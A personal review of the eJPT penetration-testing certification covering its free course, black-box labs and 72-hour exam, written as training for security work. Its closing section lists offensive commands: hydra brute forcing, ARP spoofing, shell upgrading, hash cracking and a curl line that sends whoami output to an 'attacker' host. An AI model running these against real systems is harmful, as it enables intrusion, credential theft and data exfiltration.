Context
A few months ago, I decided to change job to focus more on pentesting and offensive activities while I never done it before. I thus decided to obtain at least one certification in that domain to put on my CV. After going through the jungle of certification’s business and organisations I found eLearnSecurity eJPT to fit my requirements which were: practical knowledge course and exam, recognized on the market and cheap.
A week ago, I obtained the eJPT certification from eLearnSecurity with a score of 90% (18/20 questions). I thus decided (like a lot of people) to give a review of that certification for others like me who are looking for feedback.
The following lines are subjective and I invite anyone reading it to also read other opinions on the certification to get a good picture of it.
Format
The certification course is FREE, it is necessary to sign in into INE for a starter pass and you have access to the Penetration Testing Student (PTS) course for no charges. What cost money is the certification voucher (if you want to pass it) and it is $200.
For this kind of money and compared to the prices of other professional certifications, it is the best low-budget quality/price ratio you can find on this market. Moreover, if your objective is just to learn, well, it costs you zero to just sign in for the course and not passing the exam.
Once you connect to the INE website you have access to PTS materials, divided in:
- slides
- videos
- practical labs
Course
I found the information in the course very accurate. The slides are clear, straight to the point. The videos are a repetition of concepts seen in the slides, it demonstrates it and contains some tips that are not inside the slides. The labs are practical exercices on concepts seen both in slides and videos. That really is the plus of this course, you get your hands inside the motor and really understand the concepts you just read about.
The course is thought for beginners and divided into three parts:
- Penetration testing prerequisites
- Penetration testing: preliminary skills and programming
- Penetration testing basics
The first one is more or less a course on basic cryptography, network and web concepts. The second is a course on basic programming in C++, python and shell scripting. Coming from an IT engineering background and having worked as a developper and a security engineer in blue teams, from these two I learnt close to zero but still went through it and I have to say they explain well.
The third part was more relevant for my situation. It teaches you basic methodology of how to conduct a pentest using common industry standard tools such as nmap, nessus, metasploit, dirb/dirbuster, sqlmap etc. The outline of the course is made as if it was a pentest, so it starts with reconnaissance, then vulnerability assessment etc. I really appreciated that, because doing CTFs like I do is one thing, a professional penetration tester job is really another. That is what I lacked the most: method.
For CTF amateurs out there that would like to pass it, I recommend changing your mindset when taking the course and the exam. Being root is the beginning, finding all vulerabilities and weaknesses of a machine when you become root is the actual goal. It will still help to have done CTFs though.
It is also pretty up to date at the moment of writing these lines. The only obsolete part I could recall of were:
- The Burp Suite version: the free edition does no longer include the “spider” feature and so I had to download an older release, you can find it easily on Burp’s website download page
Of course, I recommend to set up a Kali Linux environment to do the course and the exam.
Blackbox labs
At the end of the course, you can access three black-box laboratories. For each, one or more virtual machine LANs inside where you have to practice learnt skills from the course and even more.
This is, in my humble opinion, the most realistic part of the course and what really improved my vision of pentesting.
To give you an idea of difficulty (if that is even possible), I did almost all the first black-box lab with no help (had one machine I could not root). The second I struggled a lot and had to go to solutions more than once. The third one I almost did myself, with only one detail I had to ask help on.
I strongly recommend looking at solutions only when stuck for more than a few hours. This is highly instructive on your own capacity to focus and keep calm.
I do not want to spoil these laboratories so the rest you will have to find by yourselves.
Exam
The exam is to conduct a penetration test according to a letter of engagement received from a client.
The exam last 72 hours. You get evaluated on a 20 multiple choice questions quiz. The time allowed is more than enough so I will say what everyone says about it: relax, it is no problem if you struggle with one machine, take the following one and come back later to the first.
Once the quiz submitted, you know directly if you passed or not. No waiting times.
I suggest the following when passing the exam:
- Have your notes from the course ready to be used
- Write down what you always forget to do when you did the labs or the black-boxes in a checklist
- Read the letter of engagement more than once
- Complete the quiz “as-you-go” on the penetration test, come back to it when you think you find an answer
- Write down everything, including output of commands
- Have food ready in your fridge :D
It took me around 9 hours to complete the exam. I passed with 18/20 (90%) and I am sure of one question I am wrong on, the second one, I have doubts but there is no feedback so I probably will never know.
A few commands
Some commands that I found very useful when doing the labs:
“Full” but quick nmap scan:
nmap -oN nmap_full -sV -T4 -n -p- <IP_range>
Hydra basic:
hydra -U <module_name> // help
hydra -L users.txt -P pass.txt <proto>://<IP>:<PORT>
ARP spoofing:
echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i <inteface> -t <target> -r <host>
“Upgrade” your shell to a TTY one:
bash -i
python -c 'import pty; pty.spawn("/bin/bash")'
MySQL connect to DB:
mysql -h <IP> -u <user> -P <port>
John the Ripper:
john --format=NT crackme.txt // NLTM hashes (Windows)
john --format=raw_md5 crackme.txt // MySQL dump hashes
john -wordlist=<list> -rules crackme.txt // mangling
Curl back a machine to prove a RCE:
curl http://attacker/`whoami | base64`
These are just a few examples. It is up to you to do your own list but maybe the above can give you ideas :).
Conclusion
I recommend the course and the certification to anyone like me, with no certifications on the CV and looking for an affordable, entry-level one.
I am seriously considering taking more difficult courses from eLearnSecurity seen the quality of the material they offer.
That’s all folks.